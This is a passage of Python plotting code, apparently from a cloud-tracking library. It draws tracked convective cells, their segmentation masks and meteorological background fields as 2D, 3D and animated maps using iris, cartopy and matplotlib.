axes.coastlines('10m')
# rivers=cfeature.NaturalEarthFeature(category='physical', name='rivers_lake_centerlines',scale='10m',facecolor='none')
lakes=cfeature.NaturalEarthFeature(category='physical', name='lakes',scale='10m',facecolor='none')
axes.add_feature(lakes, edgecolor='black')
axes.set_xlabel('longitude')
axes.set_ylabel('latitude')
# Plot the background field
if np.any(~np.isnan(field.data)): # check if field to plot is not only nan, which causes error:
plot_field=iplt.contourf(field,coords=['longitude','latitude'],
levels=np.linspace(vmin,vmax,num=n_levels),extend=extend,
axes=axes,
cmap=cmap,vmin=vmin,vmax=vmax,zorder=1
)
if rasterized:
axes.set_rasterization_zorder(1)
# create colorbar for background field:
cbar=plt.colorbar(plot_field,orientation=orientation_colorbar, pad=pad_colorbar,fraction=fraction_colorbar,ax=axes)
if label_colorbar is None:
label_colorbar=field.name()+ '('+field.units.symbol +')'
        if orientation_colorbar == 'horizontal':
            cbar.ax.set_xlabel(label_colorbar)
        elif orientation_colorbar == 'vertical':
cbar.ax.set_ylabel(label_colorbar)
tick_locator = ticker.MaxNLocator(nbins=5)
cbar.locator = tick_locator
cbar.update_ticks()
colors_mask=['darkred','orange','crimson','red','darkorange']
#if marker_feature is not explicitly given, set it to marker_track (will then be overwritten by the coloured markers)
if marker_feature is None:
        marker_feature=marker_track
    if markersize_feature is None:
        markersize_feature=markersize_track
    #Plot the identified features by looping over rows of DataFrame:
    if plot_features:
        for i_row,row in features.iterrows():
            axes.plot(row['longitude'],row['latitude'],
                        color='grey',marker=marker_feature,markersize=markersize_feature)
# restrict features to featues inside axis extent
track=track.loc[(track['longitude'] > axis_extent[0])
& (track['longitude'] < axis_extent[1])
& (track['latitude'] > axis_extent[2])
& (track['latitude'] < axis_extent[3])]
#Plot tracked features by looping over rows of Dataframe
for i_row,row in track.iterrows():
feature=row['feature']
cell=row['cell']
if not np.isnan(cell):
color=colors_mask[int(cell%len(colors_mask))]
if plot_number:
cell_string=' '+str(int(row['cell']))
axes.text(row['longitude'],row['latitude'],cell_string,
color=color,fontsize=6, clip_on=True)
else:
color='grey'
if plot_outline:
mask_i=None
# if mask is 3D, create surface projection, if mask is 2D keep the mask
if mask.ndim==2:
mask_i=mask_features(mask,feature,masked=False)
elif mask.ndim==3:
mask_i=mask_features_surface(mask,feature,masked=False,z_coord='model_level_number')
else:
raise ValueError('mask has shape that cannot be understood')
# plot countour lines around the edges of the mask
iplt.contour(mask_i,coords=['longitude','latitude'],
levels=[0,feature],
colors=color,linewidths=linewidth_contour,
axes=axes)
if plot_marker:
axes.plot(row['longitude'],row['latitude'],
color=color,marker=marker_track,markersize=markersize_track)
axes.set_extent(axis_extent)
return axes
def animation_mask_field(track,features,field,mask,interval=500,figsize=(10,10),**kwargs):
import cartopy.crs as ccrs
import matplotlib.pyplot as plt
import matplotlib.animation
from iris import Constraint
fig=plt.figure(figsize=figsize)
plt.close()
def update(time_in):
fig.clf()
ax=fig.add_subplot(111,projection=ccrs.PlateCarree())
constraint_time = Constraint(time=time_in)
field_i=field.extract(constraint_time)
mask_i=mask.extract(constraint_time)
track_i=track[track['time']==time_in]
features_i=features[features['time']==time_in]
#fig1,ax1=plt.subplots(ncols=1, nrows=1,figsize=figsize, subplot_kw={'projection': ccrs.PlateCarree()})
plot_tobac=plot_tracks_mask_field(track_i,field=field_i,mask=mask_i,features=features_i,
axes=ax,
**kwargs)
ax.set_title('{}'.format(time_in))
time=field.coord('time')
datetimes=time.units.num2date(time.points)
animation = matplotlib.animation.FuncAnimation(fig, update,init_func=None, frames=datetimes,interval=interval, blit=False)
return animation
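# Illustrative usage (editor's sketch, not part of the original module): the
# FuncAnimation returned above can be displayed or written out with the
# standard matplotlib writers (ffmpeg is needed for mp4 output); the keyword
# values below are placeholders forwarded to plot_tracks_mask_field().
#
#   anim = animation_mask_field(track, features, field, mask, interval=500,
#                               axis_extent=[-95, -93.5, 29.5, 31],
#                               vmin=0, vmax=30)
#   anim.save('cells.mp4')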
def plot_mask_cell_track_follow(cell,track, cog, features, mask_total,
field_contour, field_filled,
width=10000,
name= 'test', plotdir='./',
file_format=['png'],figsize=(10/2.54, 10/2.54),dpi=300,
**kwargs):
    '''Make plots for the given cell, each frame centred on the cell, with one background field plotted filled and one as contours.
Input:
Output:
'''
from iris import Constraint
from numpy import unique
import os
track_cell=track[track['cell']==cell]
for i_row,row in track_cell.iterrows():
constraint_time = Constraint(time=row['time'])
constraint_x = Constraint(projection_x_coordinate = lambda cell: row['projection_x_coordinate']-width < cell < row['projection_x_coordinate']+width)
constraint_y = Constraint(projection_y_coordinate = lambda cell: row['projection_y_coordinate']-width < cell < row['projection_y_coordinate']+width)
constraint = constraint_time & constraint_x & constraint_y
mask_total_i=mask_total.extract(constraint)
if field_contour is None:
field_contour_i=None
else:
field_contour_i=field_contour.extract(constraint)
if field_filled is None:
field_filled_i=None
else:
field_filled_i=field_filled.extract(constraint)
cells=list(unique(mask_total_i.core_data()))
if cell not in cells:
cells.append(cell)
if 0 in cells:
cells.remove(0)
track_i=track[track['cell'].isin(cells)]
track_i=track_i[track_i['time']==row['time']]
if cog is None:
cog_i=None
else:
cog_i=cog[cog['cell'].isin(cells)]
cog_i=cog_i[cog_i['time']==row['time']]
if features is None:
features_i=None
else:
features_i=features[features['time']==row['time']]
fig1, ax1 = plt.subplots(ncols=1, nrows=1, figsize=figsize)
fig1.subplots_adjust(left=0.2, bottom=0.15, right=0.85, top=0.80)
datestring_stamp = row['time'].strftime('%Y-%m-%d %H:%M:%S')
celltime_stamp = "%02d:%02d:%02d" % (row['time_cell'].dt.total_seconds() // 3600,(row['time_cell'].dt.total_seconds() % 3600) // 60, row['time_cell'].dt.total_seconds() % 60 )
title=datestring_stamp + ' , ' + celltime_stamp
datestring_file = row['time'].strftime('%Y-%m-%d_%H%M%S')
ax1=plot_mask_cell_individual_follow(cell_i=cell,track=track_i, cog=cog_i,features=features_i,
mask_total=mask_total_i,
field_contour=field_contour_i, field_filled=field_filled_i,
width=width,
axes=ax1,title=title,
**kwargs)
out_dir = os.path.join(plotdir, name)
os.makedirs(out_dir, exist_ok=True)
if 'png' in file_format:
savepath_png = os.path.join(out_dir, name + '_' + datestring_file + '.png')
fig1.savefig(savepath_png, dpi=dpi)
logging.debug('field_contour field_filled Mask plot saved to ' + savepath_png)
if 'pdf' in file_format:
savepath_pdf = os.path.join(out_dir, name + '_' + datestring_file + '.pdf')
fig1.savefig(savepath_pdf, dpi=dpi)
logging.debug('field_contour field_filled Mask plot saved to ' + savepath_pdf)
plt.close()
plt.clf()
def plot_mask_cell_individual_follow(cell_i,track, cog,features, mask_total,
field_contour, field_filled,
axes=None,width=10000,
label_field_contour=None, cmap_field_contour='Blues',norm_field_contour=None,
linewidths_contour=0.8,contour_labels=False,
vmin_field_contour=0,vmax_field_contour=50,levels_field_contour=None,nlevels_field_contour=10,
label_field_filled=None,cmap_field_filled='summer',norm_field_filled=None,
vmin_field_filled=0,vmax_field_filled=100,levels_field_filled=None,nlevels_field_filled=10,
title=None
):
    '''Make an individual plot centred on the given cell, with one background field plotted filled and one as contours.
Input:
Output:
'''
import numpy as np
from .utils import mask_cell_surface
from mpl_toolkits.axes_grid1 import make_axes_locatable
from matplotlib.colors import Normalize
divider = make_axes_locatable(axes)
x_pos=track[track['cell']==cell_i]['projection_x_coordinate'].item()
y_pos=track[track['cell']==cell_i]['projection_y_coordinate'].item()
if field_filled is not None:
if levels_field_filled is None:
levels_field_filled=np.linspace(vmin_field_filled,vmax_field_filled, nlevels_field_filled)
plot_field_filled = axes.contourf((field_filled.coord('projection_x_coordinate').points-x_pos)/1000,
(field_filled.coord('projection_y_coordinate').points-y_pos)/1000,
field_filled.data,
cmap=cmap_field_filled,norm=norm_field_filled,
levels=levels_field_filled,vmin=vmin_field_filled, vmax=vmax_field_filled)
cax_filled = divider.append_axes("right", size="5%", pad=0.1)
norm_filled= Normalize(vmin=vmin_field_filled, vmax=vmax_field_filled)
sm_filled= plt.cm.ScalarMappable(norm=norm_filled, cmap = plot_field_filled.cmap)
sm_filled.set_array([])
cbar_field_filled = plt.colorbar(sm_filled, orientation='vertical',cax=cax_filled)
cbar_field_filled.ax.set_ylabel(label_field_filled)
cbar_field_filled.set_clim(vmin_field_filled, vmax_field_filled)
if field_contour is not None:
if levels_field_contour is None:
levels_field_contour=np.linspace(vmin_field_contour, vmax_field_contour, nlevels_field_contour)
if norm_field_contour:
            vmin_field_contour=None
            vmax_field_contour=None
plot_field_contour = axes.contour((field_contour.coord('projection_x_coordinate').points-x_pos)/1000,
(field_contour.coord('projection_y_coordinate').points-y_pos)/1000,
field_contour.data,
cmap=cmap_field_contour,norm=norm_field_contour,
levels=levels_field_contour,vmin=vmin_field_contour, vmax=vmax_field_contour,
linewidths=linewidths_contour)
if contour_labels:
axes.clabel(plot_field_contour, fontsize=10)
cax_contour = divider.append_axes("bottom", size="5%", pad=0.1)
if norm_field_contour:
vmin_field_contour=None
vmax_field_contour=None
norm_contour=norm_field_contour
else:
norm_contour= Normalize(vmin=vmin_field_contour, vmax=vmax_field_contour)
sm_contour= plt.cm.ScalarMappable(norm=norm_contour, cmap = plot_field_contour.cmap)
sm_contour.set_array([])
cbar_field_contour = plt.colorbar(sm_contour, orientation='horizontal',ticks=levels_field_contour,cax=cax_contour)
cbar_field_contour.ax.set_xlabel(label_field_contour)
cbar_field_contour.set_clim(vmin_field_contour, vmax_field_contour)
for i_row, row in track.iterrows():
cell = int(row['cell'])
if cell==cell_i:
color='darkred'
else:
color='darkorange'
cell_string=' '+str(int(row['cell']))
axes.text((row['projection_x_coordinate']-x_pos)/1000,
(row['projection_y_coordinate']-y_pos)/1000,
cell_string,color=color,fontsize=6, clip_on=True)
# Plot marker for tracked cell centre as a cross
axes.plot((row['projection_x_coordinate']-x_pos)/1000,
(row['projection_y_coordinate']-y_pos)/1000,
'x', color=color,markersize=4)
#Create surface projection of mask for the respective cell and plot it in the right color
z_coord = 'model_level_number'
if len(mask_total.shape)==3:
mask_total_i_surface = mask_cell_surface(mask_total, cell, track, masked=False, z_coord=z_coord)
elif len(mask_total.shape)==2:
mask_total_i_surface=mask_total
axes.contour((mask_total_i_surface.coord('projection_x_coordinate').points-x_pos)/1000,
(mask_total_i_surface.coord('projection_y_coordinate').points-y_pos)/1000,
mask_total_i_surface.data,
levels=[0, cell], colors=color, linestyles=':',linewidth=1)
if cog is not None:
for i_row, row in cog.iterrows():
cell = row['cell']
if cell==cell_i:
color='darkred'
else:
color='darkorange'
# plot marker for centre of gravity as a circle
axes.plot((row['x_M']-x_pos)/1000, (row['y_M']-y_pos)/1000,
'o', markeredgecolor=color, markerfacecolor='None',markersize=4)
if features is not None:
for i_row, row in features.iterrows():
color='purple'
axes.plot((row['projection_x_coordinate']-x_pos)/1000,
(row['projection_y_coordinate']-y_pos)/1000,
'+', color=color,markersize=3)
axes.set_xlabel('x (km)')
axes.set_ylabel('y (km)')
axes.set_xlim([-1*width/1000, width/1000])
axes.set_ylim([-1*width/1000, width/1000])
axes.xaxis.set_label_position('top')
axes.xaxis.set_ticks_position('top')
axes.set_title(title,pad=35,fontsize=10,horizontalalignment='left',loc='left')
return axes
def plot_mask_cell_track_static(cell,track, cog, features, mask_total,
field_contour, field_filled,
width=10000,n_extend=1,
name= 'test', plotdir='./',
file_format=['png'],figsize=(10/2.54, 10/2.54),dpi=300,
**kwargs):
    '''Make plots for the given cell in a fixed frame covering the cell's entire development, with one background field plotted filled and one as contours.
Input:
Output:
'''
from iris import Constraint
from numpy import unique
import os
track_cell=track[track['cell']==cell]
x_min=track_cell['projection_x_coordinate'].min()-width
x_max=track_cell['projection_x_coordinate'].max()+width
y_min=track_cell['projection_y_coordinate'].min()-width
y_max=track_cell['projection_y_coordinate'].max()+width
#set up looping over time based on mask's time coordinate to allow for one timestep before and after the track
time_coord=mask_total.coord('time')
time=time_coord.units.num2date(time_coord.points)
i_start=max(0,np.where(time==track_cell['time'].values[0])[0][0]-n_extend)
i_end=min(len(time)-1,np.where(time==track_cell['time'].values[-1])[0][0]+n_extend+1)
time_cell=time[slice(i_start,i_end)]
for time_i in time_cell:
# for i_row,row in track_cell.iterrows():
# time_i=row['time']
# constraint_time = Constraint(time=row['time'])
constraint_time = Constraint(time=time_i)
constraint_x = Constraint(projection_x_coordinate = lambda cell: x_min < cell < x_max)
constraint_y = Constraint(projection_y_coordinate = lambda cell: y_min < cell < y_max)
constraint = constraint_time & constraint_x & constraint_y
mask_total_i=mask_total.extract(constraint)
if field_contour is None:
field_contour_i=None
else:
field_contour_i=field_contour.extract(constraint)
if field_filled is None:
field_filled_i=None
else:
field_filled_i=field_filled.extract(constraint)
track_i=track[track['time']==time_i]
cells_mask=list(unique(mask_total_i.core_data()))
track_cells=track_i.loc[(track_i['projection_x_coordinate'] > x_min) & (track_i['projection_x_coordinate'] < x_max) & (track_i['projection_y_coordinate'] > y_min) & (track_i['projection_y_coordinate'] < y_max)]
cells_track=list(track_cells['cell'].values)
cells=list(set( cells_mask + cells_track ))
if cell not in cells:
cells.append(cell)
if 0 in cells:
cells.remove(0)
track_i=track_i[track_i['cell'].isin(cells)]
if cog is None:
cog_i=None
else:
cog_i=cog[cog['cell'].isin(cells)]
cog_i=cog_i[cog_i['time']==time_i]
if features is None:
features_i=None
else:
features_i=features[features['time']==time_i]
fig1, ax1 = plt.subplots(ncols=1, nrows=1, figsize=figsize)
fig1.subplots_adjust(left=0.2, bottom=0.15, right=0.80, top=0.85)
datestring_stamp = time_i.strftime('%Y-%m-%d %H:%M:%S')
if time_i in track_cell['time'].values:
time_cell_i=track_cell[track_cell['time'].values==time_i]['time_cell']
celltime_stamp = "%02d:%02d:%02d" % (time_cell_i.dt.total_seconds() // 3600,
(time_cell_i.dt.total_seconds() % 3600) // 60,
time_cell_i.dt.total_seconds() % 60 )
else:
celltime_stamp=' - '
title=datestring_stamp + ' , ' + celltime_stamp
datestring_file = time_i.strftime('%Y-%m-%d_%H%M%S')
ax1=plot_mask_cell_individual_static(cell_i=cell,
track=track_i, cog=cog_i,features=features_i,
mask_total=mask_total_i,
field_contour=field_contour_i, field_filled=field_filled_i,
xlim=[x_min/1000,x_max/1000],ylim=[y_min/1000,y_max/1000],
axes=ax1,title=title,**kwargs)
out_dir = os.path.join(plotdir, name)
os.makedirs(out_dir, exist_ok=True)
if 'png' in file_format:
savepath_png = os.path.join(out_dir, name + '_' + datestring_file + '.png')
fig1.savefig(savepath_png, dpi=dpi)
logging.debug('Mask static plot saved to ' + savepath_png)
if 'pdf' in file_format:
savepath_pdf = os.path.join(out_dir, name + '_' + datestring_file + '.pdf')
fig1.savefig(savepath_pdf, dpi=dpi)
logging.debug('Mask static plot saved to ' + savepath_pdf)
plt.close()
plt.clf()
def plot_mask_cell_individual_static(cell_i,track, cog, features, mask_total,
field_contour, field_filled,
axes=None,xlim=None,ylim=None,
label_field_contour=None, cmap_field_contour='Blues',norm_field_contour=None,
linewidths_contour=0.8,contour_labels=False,
vmin_field_contour=0,vmax_field_contour=50,levels_field_contour=None,nlevels_field_contour=10,
label_field_filled=None,cmap_field_filled='summer',norm_field_filled=None,
vmin_field_filled=0,vmax_field_filled=100,levels_field_filled=None,nlevels_field_filled=10,
title=None,feature_number=False
):
    '''Make a plot for the given cell in a fixed frame, with one background field plotted filled and one as contours.
Input:
Output:
'''
import numpy as np
from .utils import mask_features,mask_features_surface
from mpl_toolkits.axes_grid1 import make_axes_locatable
from matplotlib.colors import Normalize
divider = make_axes_locatable(axes)
if field_filled is not None:
if levels_field_filled is None:
levels_field_filled=np.linspace(vmin_field_filled,vmax_field_filled, 10)
plot_field_filled = axes.contourf(field_filled.coord('projection_x_coordinate').points/1000,
field_filled.coord('projection_y_coordinate').points/1000,
field_filled.data,
levels=levels_field_filled, norm=norm_field_filled,
cmap=cmap_field_filled, vmin=vmin_field_filled, vmax=vmax_field_filled)
cax_filled = divider.append_axes("right", size="5%", pad=0.1)
norm_filled= Normalize(vmin=vmin_field_filled, vmax=vmax_field_filled)
sm1= plt.cm.ScalarMappable(norm=norm_filled, cmap = plot_field_filled.cmap)
sm1.set_array([])
cbar_field_filled = plt.colorbar(sm1, orientation='vertical',cax=cax_filled)
cbar_field_filled.ax.set_ylabel(label_field_filled)
cbar_field_filled.set_clim(vmin_field_filled, vmax_field_filled)
if field_contour is not None:
if levels_field_contour is None:
levels_field_contour=np.linspace(vmin_field_contour, vmax_field_contour, 5)
plot_field_contour = axes.contour(field_contour.coord('projection_x_coordinate').points/1000,
field_contour.coord('projection_y_coordinate').points/1000,
field_contour.data,
cmap=cmap_field_contour,norm=norm_field_contour,
levels=levels_field_contour,vmin=vmin_field_contour, vmax=vmax_field_contour,
linewidths=linewidths_contour)
if contour_labels:
axes.clabel(plot_field_contour, fontsize=10)
cax_contour = divider.append_axes("bottom", size="5%", pad=0.1)
if norm_field_contour:
vmin_field_contour=None
vmax_field_contour=None
norm_contour=norm_field_contour
else:
norm_contour= Normalize(vmin=vmin_field_contour, vmax=vmax_field_contour)
sm_contour= plt.cm.ScalarMappable(norm=norm_contour, cmap = plot_field_contour.cmap)
sm_contour.set_array([])
cbar_field_contour = plt.colorbar(sm_contour, orientation='horizontal',ticks=levels_field_contour,cax=cax_contour)
cbar_field_contour.ax.set_xlabel(label_field_contour)
cbar_field_contour.set_clim(vmin_field_contour, vmax_field_contour)
for i_row, row in track.iterrows():
cell = row['cell']
feature = row['feature']
# logging.debug("cell: "+ str(row['cell']))
# logging.debug("feature: "+ str(row['feature']))
if cell==cell_i:
color='darkred'
if feature_number:
cell_string=' '+str(int(cell))+' ('+str(int(feature))+')'
else:
cell_string=' '+str(int(cell))
elif np.isnan(cell):
color='gray'
if feature_number:
cell_string=' '+'('+str(int(feature))+')'
else:
cell_string=' '
else:
color='darkorange'
if feature_number:
cell_string=' '+str(int(cell))+' ('+str(int(feature))+')'
else:
cell_string=' '+str(int(cell))
axes.text(row['projection_x_coordinate']/1000,
row['projection_y_coordinate']/1000,
cell_string,color=color,fontsize=6, clip_on=True)
# Plot marker for tracked cell centre as a cross
axes.plot(row['projection_x_coordinate']/1000,
row['projection_y_coordinate']/1000,
'x', color=color,markersize=4)
#Create surface projection of mask for the respective cell and plot it in the right color
z_coord = 'model_level_number'
if len(mask_total.shape)==3:
mask_total_i_surface = mask_features_surface(mask_total, feature, masked=False, z_coord=z_coord)
elif len(mask_total.shape)==2:
mask_total_i_surface=mask_features(mask_total, feature, masked=False, z_coord=z_coord)
axes.contour(mask_total_i_surface.coord('projection_x_coordinate').points/1000,
mask_total_i_surface.coord('projection_y_coordinate').points/1000,
mask_total_i_surface.data,
                     levels=[0, feature], colors=color, linestyles=':',linewidths=1)
if cog is not None:
for i_row, row in cog.iterrows():
cell = row['cell']
if cell==cell_i:
color='darkred'
else:
color='darkorange'
# plot marker for centre of gravity as a circle
axes.plot(row['x_M']/1000, row['y_M']/1000,
'o', markeredgecolor=color, markerfacecolor='None',markersize=4)
if features is not None:
for i_row, row in features.iterrows():
color='purple'
axes.plot(row['projection_x_coordinate']/1000,
row['projection_y_coordinate']/1000,
'+', color=color,markersize=3)
axes.set_xlabel('x (km)')
axes.set_ylabel('y (km)')
axes.set_xlim(xlim)
axes.set_ylim(ylim)
axes.xaxis.set_label_position('top')
axes.xaxis.set_ticks_position('top')
axes.set_title(title,pad=35,fontsize=10,horizontalalignment='left',loc='left')
return axes
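# Editor's usage sketch (added for clarity, not part of the original module): a minimal
# example of calling plot_mask_cell_individual_static for a single timestep. The arguments
# track_i, features_i, mask_i, field_fill and field_lines are assumed to be the per-timestep
# track/feature DataFrames and iris Cubes produced by the tracking and segmentation steps;
# the cell id, axis limits and colorbar labels below are placeholders.
def _example_plot_mask_cell_individual_static(track_i, features_i, mask_i, field_fill, field_lines):
    import matplotlib.pyplot as plt
    fig, ax = plt.subplots(ncols=1, nrows=1, figsize=(10 / 2.54, 10 / 2.54))
    ax = plot_mask_cell_individual_static(cell_i=1,
                                          track=track_i, cog=None, features=features_i,
                                          mask_total=mask_i,
                                          field_contour=field_lines, field_filled=field_fill,
                                          xlim=[0, 100], ylim=[0, 100],
                                          axes=ax, title='example',
                                          label_field_filled='filled field',
                                          label_field_contour='contour field')
    return fig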
def plot_mask_cell_track_2D3Dstatic(cell,track, cog, features, mask_total,
field_contour, field_filled,
width=10000,n_extend=1,
name= 'test', plotdir='./',
file_format=['png'],figsize=(10/2.54, 10/2.54),dpi=300,
ele=10,azim=30,
**kwargs):
    '''Make combined 2D/3D plots for a single cell in a fixed frame covering its entire development, with one background field as filled contours and one as contour lines.
    Input:
    cell (id of the cell), track/cog/features (DataFrames), mask_total (iris Cube with the segmentation mask), field_contour/field_filled (iris Cubes, either may be None)
    Output:
    None; one figure per timestep is written to plotdir/name in the requested file formats
    '''
from iris import Constraint
from numpy import unique
import os
from mpl_toolkits.mplot3d import Axes3D
import matplotlib.gridspec as gridspec
track_cell=track[track['cell']==cell]
x_min=track_cell['projection_x_coordinate'].min()-width
x_max=track_cell['projection_x_coordinate'].max()+width
y_min=track_cell['projection_y_coordinate'].min()-width
y_max=track_cell['projection_y_coordinate'].max()+width
#set up looping over time based on mask's time coordinate to allow for one timestep before and after the track
time_coord=mask_total.coord('time')
time=time_coord.units.num2date(time_coord.points)
i_start=max(0,np.where(time==track_cell['time'].values[0])[0][0]-n_extend)
i_end=min(len(time)-1,np.where(time==track_cell['time'].values[-1])[0][0]+n_extend+1)
time_cell=time[slice(i_start,i_end)]
for time_i in time_cell:
# for i_row,row in track_cell.iterrows():
# time_i=row['time']
# constraint_time = Constraint(time=row['time'])
constraint_time = Constraint(time=time_i)
constraint_x = Constraint(projection_x_coordinate = lambda cell: x_min < cell < x_max)
constraint_y = Constraint(projection_y_coordinate = lambda cell: y_min < cell < y_max)
constraint = constraint_time & constraint_x & constraint_y
mask_total_i=mask_total.extract(constraint)
if field_contour is None:
field_contour_i=None
else:
field_contour_i=field_contour.extract(constraint)
if field_filled is None:
field_filled_i=None
else:
field_filled_i=field_filled.extract(constraint)
track_i=track[track['time']==time_i]
cells_mask=list(unique(mask_total_i.core_data()))
track_cells=track_i.loc[(track_i['projection_x_coordinate'] > x_min) & (track_i['projection_x_coordinate'] < x_max) & (track_i['projection_y_coordinate'] > y_min) & (track_i['projection_y_coordinate'] < y_max)]
cells_track=list(track_cells['cell'].values)
cells=list(set( cells_mask + cells_track ))
if cell not in cells:
cells.append(cell)
if 0 in cells:
cells.remove(0)
track_i=track_i[track_i['cell'].isin(cells)]
if cog is None:
cog_i=None
else:
cog_i=cog[cog['cell'].isin(cells)]
cog_i=cog_i[cog_i['time']==time_i]
if features is None:
features_i=None
else:
features_i=features[features['time']==time_i]
fig1=plt.figure(figsize=(20 / 2.54, 10 / 2.54))
fig1.subplots_adjust(left=0.1, bottom=0.15, right=0.9, top=0.9,wspace=0.3, hspace=0.25)
# make two subplots for figure:
gs1 = gridspec.GridSpec(1, 2,width_ratios=[1,1.2])
fig1.add_subplot(gs1[0])
fig1.add_subplot(gs1[1], projection='3d')
ax1 = fig1.get_axes()
datestring_stamp = time_i.strftime('%Y-%m-%d %H:%M:%S')
if time_i in track_cell['time'].values:
time_cell_i=track_cell[track_cell['time'].values==time_i]['time_cell']
celltime_stamp = "%02d:%02d:%02d" % (time_cell_i.dt.total_seconds() // 3600,
(time_cell_i.dt.total_seconds() % 3600) // 60,
time_cell_i.dt.total_seconds() % 60 )
else:
celltime_stamp=' - '
title=datestring_stamp + ' , ' + celltime_stamp
datestring_file = time_i.strftime('%Y-%m-%d_%H%M%S')
ax1[0]=plot_mask_cell_individual_static(cell_i=cell,
track=track_i, cog=cog_i,features=features_i,
mask_total=mask_total_i,
field_contour=field_contour_i, field_filled=field_filled_i,
xlim=[x_min/1000,x_max/1000],ylim=[y_min/1000,y_max/1000],
axes=ax1[0],title=title,**kwargs)
ax1[1]=plot_mask_cell_individual_3Dstatic(cell_i=cell,
track=track_i, cog=cog_i,features=features_i,
mask_total=mask_total_i,
field_contour=field_contour_i, field_filled=field_filled_i,
xlim=[x_min/1000,x_max/1000],ylim=[y_min/1000,y_max/1000],
axes=ax1[1],title=title,
ele=ele,azim=azim,
**kwargs)
out_dir = os.path.join(plotdir, name)
os.makedirs(out_dir, exist_ok=True)
if 'png' in file_format:
savepath_png = os.path.join(out_dir, name + '_' + datestring_file + '.png')
fig1.savefig(savepath_png, dpi=dpi)
logging.debug('Mask static 2d/3D plot saved to ' + savepath_png)
if 'pdf' in file_format:
savepath_pdf = os.path.join(out_dir, name + '_' + datestring_file + '.pdf')
fig1.savefig(savepath_pdf, dpi=dpi)
logging.debug('Mask static 2d/3D plot saved to ' + savepath_pdf)
plt.close()
plt.clf()
def plot_mask_cell_track_3Dstatic(cell,track, cog, features, mask_total,
field_contour, field_filled,
width=10000,n_extend=1,
name= 'test', plotdir='./',
file_format=['png'],figsize=(10/2.54, 10/2.54),dpi=300,
**kwargs):
    '''Make 3D plots for a single cell in a fixed frame covering its entire development, with one background field as filled contours and one as contour lines.
    Input:
    cell (id of the cell), track/cog/features (DataFrames), mask_total (iris Cube with the segmentation mask), field_contour/field_filled (iris Cubes, either may be None)
    Output:
    None; one figure per timestep is written to plotdir/name in the requested file formats
    '''
from iris import Constraint
from numpy import unique
import os
from mpl_toolkits.mplot3d import Axes3D
track_cell=track[track['cell']==cell]
x_min=track_cell['projection_x_coordinate'].min()-width
x_max=track_cell['projection_x_coordinate'].max()+width
y_min=track_cell['projection_y_coordinate'].min()-width
y_max=track_cell['projection_y_coordinate'].max()+width
#set up looping over time based on mask's time coordinate to allow for one timestep before and after the track
time_coord=mask_total.coord('time')
time=time_coord.units.num2date(time_coord.points)
i_start=max(0,np.where(time==track_cell['time'].values[0])[0][0]-n_extend)
i_end=min(len(time)-1,np.where(time==track_cell['time'].values[-1])[0][0]+n_extend+1)
time_cell=time[slice(i_start,i_end)]
for time_i in time_cell:
# for i_row,row in track_cell.iterrows():
# time_i=row['time']
# constraint_time = Constraint(time=row['time'])
constraint_time = Constraint(time=time_i)
constraint_x = Constraint(projection_x_coordinate = lambda cell: x_min < cell < x_max)
constraint_y = Constraint(projection_y_coordinate = lambda cell: y_min < cell < y_max)
constraint = constraint_time & constraint_x & constraint_y
mask_total_i=mask_total.extract(constraint)
if field_contour is None:
field_contour_i=None
else:
field_contour_i=field_contour.extract(constraint)
if field_filled is None:
field_filled_i=None
else:
field_filled_i=field_filled.extract(constraint)
track_i=track[track['time']==time_i]
cells_mask=list(unique(mask_total_i.core_data()))
track_cells=track_i.loc[(track_i['projection_x_coordinate'] > x_min) & (track_i['projection_x_coordinate'] < x_max) & (track_i['projection_y_coordinate'] > y_min) & (track_i['projection_y_coordinate'] < y_max)]
cells_track=list(track_cells['cell'].values)
cells=list(set( cells_mask + cells_track ))
if cell not in cells:
cells.append(cell)
if 0 in cells:
cells.remove(0)
track_i=track_i[track_i['cell'].isin(cells)]
if cog is None:
cog_i=None
else:
cog_i=cog[cog['cell'].isin(cells)]
cog_i=cog_i[cog_i['time']==time_i]
if features is None:
features_i=None
else:
features_i=features[features['time']==time_i]
# fig1, ax1 = plt.subplots(ncols=1, nrows=1, figsize=figsize)
# fig1.subplots_adjust(left=0.2, bottom=0.15, right=0.80, top=0.85)
fig1, ax1 = plt.subplots(ncols=1, nrows=1, figsize=(10/2.54, 10/2.54), subplot_kw={'projection': '3d'})
datestring_stamp = time_i.strftime('%Y-%m-%d %H:%M:%S')
if time_i in track_cell['time'].values:
time_cell_i=track_cell[track_cell['time'].values==time_i]['time_cell']
celltime_stamp = "%02d:%02d:%02d" % (time_cell_i.dt.total_seconds() // 3600,
(time_cell_i.dt.total_seconds() % 3600) // 60,
time_cell_i.dt.total_seconds() % 60 )
else:
celltime_stamp=' - '
title=datestring_stamp + ' , ' + celltime_stamp
datestring_file = time_i.strftime('%Y-%m-%d_%H%M%S')
ax1=plot_mask_cell_individual_3Dstatic(cell_i=cell,
track=track_i, cog=cog_i,features=features_i,
mask_total=mask_total_i,
field_contour=field_contour_i, field_filled=field_filled_i,
xlim=[x_min/1000,x_max/1000],ylim=[y_min/1000,y_max/1000],
axes=ax1,title=title,**kwargs)
out_dir = os.path.join(plotdir, name)
os.makedirs(out_dir, exist_ok=True)
if 'png' in file_format:
savepath_png = os.path.join(out_dir, name + '_' + datestring_file + '.png')
fig1.savefig(savepath_png, dpi=dpi)
logging.debug('Mask static plot saved to ' + savepath_png)
if 'pdf' in file_format:
savepath_pdf = os.path.join(out_dir, name + '_' + datestring_file + '.pdf')
fig1.savefig(savepath_pdf, dpi=dpi)
logging.debug('Mask static plot saved to ' + savepath_pdf)
plt.close()
plt.clf()
def plot_mask_cell_individual_3Dstatic(cell_i,track, cog, features, mask_total,
field_contour, field_filled,
axes=None,xlim=None,ylim=None,
label_field_contour=None, cmap_field_contour='Blues',norm_field_contour=None,
linewidths_contour=0.8,contour_labels=False,
vmin_field_contour=0,vmax_field_contour=50,levels_field_contour=None,nlevels_field_contour=10,
label_field_filled=None,cmap_field_filled='summer',norm_field_filled=None,
vmin_field_filled=0,vmax_field_filled=100,levels_field_filled=None,nlevels_field_filled=10,
title=None,feature_number=False,
ele=10.,azim=210.
):
    '''Make a 3D plot of one cell at a single timestep in a fixed frame. The background field arguments are accepted for API compatibility, but the corresponding plotting code is currently commented out, so only the cell masks are drawn.
    Input:
    cell_i (id of the cell), track/cog/features (DataFrames), mask_total (3D iris Cube with the segmentation mask)
    Output:
    axes: matplotlib 3D axes containing the plot
    '''
import numpy as np
from .utils import mask_features,mask_features_surface
# from mpl_toolkits.axes_grid1 import make_axes_locatable
# from matplotlib.colors import Normalize
from mpl_toolkits.mplot3d import Axes3D
axes.view_init(elev=ele, azim=azim)
